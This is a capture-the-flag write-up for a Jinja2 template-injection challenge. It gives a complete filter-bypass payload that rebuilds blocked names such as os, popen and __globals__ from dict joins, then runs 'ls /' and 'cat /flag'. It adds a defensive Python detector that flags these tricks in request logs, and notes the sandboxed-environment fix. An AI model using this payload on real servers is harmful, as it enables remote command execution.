[GDOUCTF 2023]<ez_ze>!

This challenge is a Jinja2 SSTI (template injection). Testing shows the following are filtered:
_ {{}} . [] '' os popen getitem
Enter {% print(lipsum|string|list) %} or {% print(config|string|list) %}


From that output we pick out the characters we need.
Get the underscore and the space:

{% set pop=dict(pop=1)|join %}
{% set xia=(lipsum|string|list)|attr(pop)(18) %}        // underscore
{% set kong=(lipsum|string|list)|attr(pop)(9) %}        // space

Get the slash:

{% set pop=dict(pop=1)|join %}
{% set xie=(config|string|list)|attr(pop)(239) %}

Then build globals:
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}
Build getitem:
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}
Execute:

{% set pop=dict(pop=1)|join %}
{% set kong=(lipsum|string|list)|attr(pop)(9) %}
{% set xia=(lipsum|string|list)|attr(pop)(18) %}
{% set xie=(config|string|list)|attr(pop)(239) %}
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}
{% set o=dict(o=a,s=b)|join %}
{% set po=dict(pop=a,en=b)|join %}
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}
{% set read=dict(read=a)|join %}
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}

Explanation

{% set pop=dict(pop=1)|join %}
{% set kong=(lipsum|string|list)|attr(pop)(9) %}                    // kong = space
{% set xia=(lipsum|string|list)|attr(pop)(18) %}                    // xia = _
{% set xie=(config|string|list)|attr(pop)(239) %}                   // xie = /
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}       // globals = __globals__
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}       // geti = __getitem__
{% set o=dict(o=a,s=b)|join %}                                      // o = os
{% set po=dict(pop=a,en=b)|join %}                                  // po = popen
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}                  // cmd = ls /
{% set read=dict(read=a)|join %}                                    // read = read
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}


Finally, just change the command.
Final payload:

{% set pop=dict(pop=1)|join %}
{% set kong=(lipsum|string|list)|attr(pop)(9) %}
{% set xia=(lipsum|string|list)|attr(pop)(18) %}
{% set xie=(config|string|list)|attr(pop)(239) %}
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}
{% set o=dict(o=a,s=b)|join %}
{% set po=dict(pop=a,en=b)|join %}
{% set cmd=(dict(cat=a)|join,kong,xie,dict(flag=b)|join)|join %}
{% set read=dict(read=a)|join %}
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}
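The reason a blocklist of words like os, popen and getitem fails here is that the payload never contains them literally; it rebuilds them from dict keys and tuple joins. As an added defender-side example (not part of the original writeup), the Python script below statically evaluates those dict(...)|join and (...)|join tricks in a request parameter and reports which identifiers they reassemble, so a WAF rule or log review can catch the technique rather than the words. The access-log lines and the parameter name "name" are constructed for this example; the payload string is the ls payload from the writeup above. Characters the payload fetches from a runtime string (the |attr(pop)(N) indexing) cannot be known statically and are shown as "?".

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Identifiers the writeup's payload reassembles piece by piece. None of them
# appear literally in the request, which is why a plain keyword filter misses them.
SENSITIVE_NAMES = {"globals", "getitem", "os", "popen", "read"}

SET_RE = re.compile(r"\{%\s*set\s+(\w+)\s*=\s*(.+?)\s*%\}")
DICT_JOIN_RE = re.compile(r"^dict\(([^()]*)\)\s*\|\s*join$")
TUPLE_JOIN_RE = re.compile(r"^\((.*)\)\s*\|\s*join$")

# The 'ls /' payload from the writeup, used here as sample input.
WRITEUP_PAYLOAD = "\n".join([
    "{% set pop=dict(pop=1)|join %}",
    "{% set kong=(lipsum|string|list)|attr(pop)(9) %}",
    "{% set xia=(lipsum|string|list)|attr(pop)(18) %}",
    "{% set xie=(config|string|list)|attr(pop)(239) %}",
    "{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}",
    "{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}",
    "{% set o=dict(o=a,s=b)|join %}",
    "{% set po=dict(pop=a,en=b)|join %}",
    "{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}",
    "{% set read=dict(read=a)|join %}",
    "{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}",
])

# Constructed access-log lines (not real traffic): a benign request and one
# carrying the payload URL-encoded in the hypothetical 'name' parameter.
SAMPLE_LOG_LINES = [
    "GET /?name=alice 200",
    "GET /?name=" + quote_plus(WRITEUP_PAYLOAD) + " 200",
]


def split_top_level(s):
    """Split on commas that are not nested inside parentheses."""
    parts, depth, cur = [], 0, []
    for ch in s:
        if ch == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
            continue
        depth += (ch == "(") - (ch == ")")
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


def resolve(expr, env):
    """Statically evaluate the join tricks used to bypass the keyword filter."""
    expr = expr.strip()
    m = DICT_JOIN_RE.match(expr)
    if m:
        # dict(get=a,item=b)|join yields the concatenated keys: "getitem"
        keys = [kv.split("=", 1)[0].strip() for kv in m.group(1).split(",")]
        return "".join(k for k in keys if k)
    m = TUPLE_JOIN_RE.match(expr)
    if m:
        # (xia,xia,dict(globals=a)|join,xia,xia)|join concatenates its members
        return "".join(resolve(part, env) for part in split_top_level(m.group(1)))
    # Either a variable set earlier, or a character pulled from a runtime string
    # such as (lipsum|string|list)|attr(pop)(18), which we cannot know statically.
    return env.get(expr, "?")


def analyze_template_input(raw_value):
    """Decode one parameter value and report rebuilt identifiers and indicators."""
    text = unquote_plus(raw_value)
    env = {}
    for name, expr in SET_RE.findall(text):
        env[name] = resolve(expr, env)
    rebuilt = sorted({v.strip("?") for v in env.values()} & SENSITIVE_NAMES)
    indicators = []
    if "|attr(" in text.replace(" ", ""):
        indicators.append("attr-filter")
    if re.search(r"dict\([^()]*\)\s*\|\s*join", text):
        indicators.append("dict-join")
    if re.search(r"\|\s*string\s*\|\s*list", text):
        indicators.append("string-list-indexing")
    return {
        "variables": env,
        "sensitive": rebuilt,
        "indicators": indicators,
        "suspicious": bool(rebuilt) or len(indicators) >= 2,
    }


def scan_log(lines):
    """Return (line number, analysis) for every log line whose 'name' looks like SSTI."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = re.search(r"[?&]name=([^\s&]+)", line)
        if m:
            result = analyze_template_input(m.group(1))
            if result["suspicious"]:
                hits.append((lineno, result))
    return hits


if __name__ == "__main__":
    for lineno, result in scan_log(SAMPLE_LOG_LINES):
        print(f"line {lineno}: rebuilt {result['sensitive']} via {result['indicators']}")
        for var, value in result["variables"].items():
            print(f"  {var} = {value}")
```

On the writeup's payload the decoder reports globals as "??globals??" and geti as "??getitem??" (the underscores are runtime-fetched, hence unknown), and po, o and read as popen, os and read. Matching on the rebuilt names plus the attr/dict-join/string-list indicators is far more robust than the literal word filter the challenge relied on; the real fix, of course, is never to render user input as a template at all, or at minimum to use Jinja2's SandboxedEnvironment, which refuses attribute access to names beginning with an underscore.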
posted @ 2024-09-12 22:27  lcmz  views(63)  comments(0)